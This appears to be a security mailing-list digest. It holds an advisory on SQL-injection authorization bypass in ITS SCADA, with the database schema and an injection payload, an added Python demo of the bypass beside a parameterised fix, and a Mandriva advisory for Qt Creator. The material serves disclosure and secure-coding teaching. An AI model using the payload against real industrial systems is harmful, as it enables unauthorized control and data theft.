 690b28356d34cc1da502f04dda722ea5  2010.0/x86_64/git-arch-1.6.4.4-6.1mdv2010.0.x86_64.rpm
 848b95d3e8d2755d7e9bc885600c16b2  2010.0/x86_64/git-core-1.6.4.4-6.1mdv2010.0.x86_64.rpm
 12e3fc6006f1a688da619ed304ed703f
[STANKOINFORMZASCHITA-10-02] ITS SCADA Authorization bypass
[STANKOINFORMZASCHITA-10-02] ITS SCADA Authorization bypass

Authors: Eugene Salov (eug...@itdefence.ru), Andrej Komarov (koma...@itdefence.ru)
Product: ITS SCADA
CVSS v2 Base Score: 9.0 (AV:N/AC:L/Au:R/C:C/I:C/A:C)
Impact Subscore: 10.0
Exploitability Subscore: 8.0
Availability of exploit: Yes

Product description:
ITS SCADA is a Supervisory Control And Data Acquisition (SCADA) system, which can interface with various heterogeneous industrial automation equipment of the Motorola MOSCAD family. Additionally, it can be installed with elements of the Wonderware product environment (Industrial SQL Server, MODBUS I/O Server).
URL: http://www.itsdemo.com

Vulnerability description:
Unauthorized access to database field data can be obtained with the help of SQL injection exploitation. Moreover, it can help an attacker to bypass authorization without any password validation.

Database structure:
«RTUinfo»: SiteNum, SiteType, Description;
«Alarms»: EventStamp, AlarmState, TagName, Description, Operator, Provider, EventStampUTC;
«BWMInfo»: RTU, SalesLocation, Description, Type, Summ;
«dtproperties»: id, objectid, property, value, uvalue, version;
«FlowData»: Site, iDate, DateTime, Rate, Peak, Average, Total, Lvl;
«sysconstraints»: constid, id, colid, spare1, status, actions, error;
«syssegments»: segment, name, status;
«Users»: UID, Password, AccessLevel.

The given elements of the database structure contain various information about connected telemetric devices, users, failures and alarms that occurred, and the execution course of the technological process.

Exploitation method:
User ID = 1' or 1=(select top 1 password from Users)--
Password = blank

Solution:
There is no security update available for now. It is highly recommended not to use default passwords for user authorization. Moreover, you can additionally use ACLs to allow access only from trusted hosts. Another additional safety measure is the use of Web Application Firewalls (WAF) and IPS/IDS systems in the area where the SCADA system is located.

About STC «STANKOINFORMZASCHITA»:
Science Technology Center (STC) «STANKOINFORMZASCHITA» is the leading information security company in the Russian Federation in the sphere of automation and industrial security, providing information security consulting services, information security audit, and penetration testing of SCADA and industrial control systems.

Contact: info (at) itdefence (dot) ru
Russia, Moscow, Bolshaya Bochtovaya st., 26, Business Center
Tel.: +7 (495) 790-16-60
http://itdefence.ru
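The exploitation string in the advisory above works because the user ID is concatenated into the login query text: the single quote closes the UID literal, the OR clause makes the row filter true, and the trailing -- comments out the password comparison. The Python below is an added example, not the advisory authors' code and not the ITS SCADA code base; it runs a payload of the same shape against a constructed in-memory SQLite stand-in for the advisory's Users table (UID, Password, AccessLevel), once through a concatenated query and once through a parameterised one. SQLite has no TOP, so the subquery uses LIMIT 1, and the rows and passwords are made up for the demonstration.

```python
import sqlite3

# Constructed stand-in for the advisory's "Users" table; rows are invented.
DEMO_USERS = [("1", "s3cret-operator-pw", 9), ("2", "viewer-pw", 1)]


def make_demo_db():
    """Create an in-memory SQLite database holding the constructed Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UID TEXT, Password TEXT, AccessLevel INTEGER)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", DEMO_USERS)
    return conn


def login_vulnerable(conn, user_id, password):
    """String-concatenated login query: user input becomes part of the SQL text."""
    sql = ("SELECT UID, AccessLevel FROM Users "
           "WHERE UID = '%s' AND Password = '%s'" % (user_id, password))
    return conn.execute(sql).fetchone()


def login_safe(conn, user_id, password):
    """Parameterised query: the same input is bound as data, never parsed as SQL."""
    sql = "SELECT UID, AccessLevel FROM Users WHERE UID = ? AND Password = ?"
    return conn.execute(sql, (user_id, password)).fetchone()


# Same shape as the advisory's "1' or 1=(select top 1 ...)--" payload, in SQLite
# dialect (LIMIT 1 instead of TOP 1). In the concatenated query the quote closes
# the UID literal and "--" comments out the password check entirely.
BYPASS_UID = "1' OR 1=(SELECT 1 FROM Users LIMIT 1)--"


def demo():
    """Run the payload through both login paths and a real login through the safe one."""
    conn = make_demo_db()
    return {
        # Bypass: returns the first Users row without any password.
        "vulnerable_bypass": login_vulnerable(conn, BYPASS_UID, ""),
        # Same payload bound as a parameter: no UID literally equals it, so no row.
        "safe_same_payload": login_safe(conn, BYPASS_UID, ""),
        # The parameterised path still works for genuine credentials.
        "safe_real_creds": login_safe(conn, "1", "s3cret-operator-pw"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(name, "->", row)
```

Parameter binding is the fix that removes the bug class; the WAF/IPS and ACL measures the advisory recommends reduce exposure but do not change how the query is built.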
[ MDVSA-2010:193 ] qt-creator
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2010:193
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : qt-creator
 Date    : October 3, 2010
 Affected: 2010.0, 2010.1
 _______________________________________________________________________

 Problem Description:

 A vulnerability has been found in Qt Creator 2.0.0 and previous versions. The vulnerability occurs because of an insecure manipulation of a Unix environment variable by the qtcreator shell script. It manifests by causing Qt or Qt Creator to attempt to load certain library names from the current working directory (CVE-2010-3374).

 The updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3374
 http://qt.nokia.com/about/news/security-announcement-qt-creator-2.0.0-for-desktop-platforms
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2010.0:
 72f483e1687632ee9887b5742b72891d  2010.0/i586/libaggregation1-1.2.1-2.2mdv2010.0.i586.rpm
 38ef2476d9ca746576549cd230fed498  2010.0/i586/libcplusplus1-1.2.1-2.2mdv2010.0.i586.rpm
 33d7aa73bc3793f7327e5e2160409f4b  2010.0/i586/libextensionsystem1-1.2.1-2.2mdv2010.0.i586.rpm
 6429fd08060935dbecf7f7bdec4d2160  2010.0/i586/libqtconcurrent1-1.2.1-2.2mdv2010.0.i586.rpm
 029072ad2feb8299499a79f75bf4ae8e  2010.0/i586/libutils1-1.2.1-2.2mdv2010.0.i586.rpm
 af66282a6100278935d3a2137af01522  2010.0/i586/qt-creator-1.2.1-2.2mdv2010.0.i586.rpm
 617fccd89b2020320e4492364caed27c  2010.0/i586/qt-creator-doc-1.2.1-2.2mdv2010.0.i586.rpm
 1a7f7c6820ac43102c30bf3c5ffa570c  2010.0/SRPMS/qt-creator-1.2.1-2.2mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 a2b277c9e816765850be2242dd725738  2010.0/x86_64/lib64aggregation1-1.2.1-2.2mdv2010.0.x86_64.rpm
 553865d75cf73ac6c878b013dd7230eb  2010.0/x86_64/lib64cplusplus1-1.2.1-2.2mdv2010.0.x86_64.rpm
 b4067d049b8333c6986eb7b7ae15bd92  2010.0/x86_64/lib64extensionsystem1-1.2.1-2.2mdv2010.0.x86_64.rpm
 4edc6b295e3da81e798abf9fd7f29055  2010.0/x86_64/lib64qtconcurrent1-1.2.1-2.2mdv2010.0.x86_64.rpm
 4513fa9422e50fc2766009cd0e36bef3  2010.0/x86_64/lib64utils1-1.2.1-2.2mdv2010.0.x86_64.rpm
 75e44c0a21ee51a31723b8745f1dafca  2010.0/x86_64/qt-creator-1.2.1-2.2mdv2010.0.x86_64.rpm
 f150dba6979ef40f976972f6acc75180  2010.0/x86_64/qt-creator-doc-1.2.1-2.2mdv2010.0.x86_64.rpm
 1a7f7c6820ac43102c30bf3c5ffa570c  2010.0/SRPMS/qt-creator-1.2.1-2.2mdv2010.0.src.rpm

 Mandriva Linux 2010.1:
 127afd19d86e5e5fb75a9a9a98ceec10  2010.1/i586/qt-creator-1.3.1-3.2mdv2010.1.i586.rpm
 2af40e3c8026a3cf2c2a363bac6f04c5  2010.1/i586/qt-creator-doc-1.3.1-3.2mdv2010.1.i586.rpm
 4cd4b31b37f920c3c4e8c074c5d6e6d5  2010.1/SRPMS/qt-creator-1.3.1-3.2mdv2010.1.src.rpm

 Mandriva Linux 2010.1/X86_64:
 d36be9f4a84212098a5c18248a5f4465  2010.1/x86_64/qt-creator-1.3.1-3.2mdv2010.1.x86_64.rpm
 911034c2b800c9021141242a56aae79a  2010.1/x86_64/qt-creator-doc-1.3.1-3.2mdv2010.1.x86_64.rpm
 4cd4b31b37f920c3c4e8c074c5d6e6d5  2010.1/SRPMS/qt-creator-1.3.1-3.2mdv2010.1.src.rpm
 _______________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFMqEsRmqjQ0CJFipgRAm4BAJ0b7XnaZghX83QGkIWeI0h4/+AdbgCfVdIv
XmQcNcc6OmY0kXyBYjnudVs=
=YDKE
-----END PGP SIGNATURE-----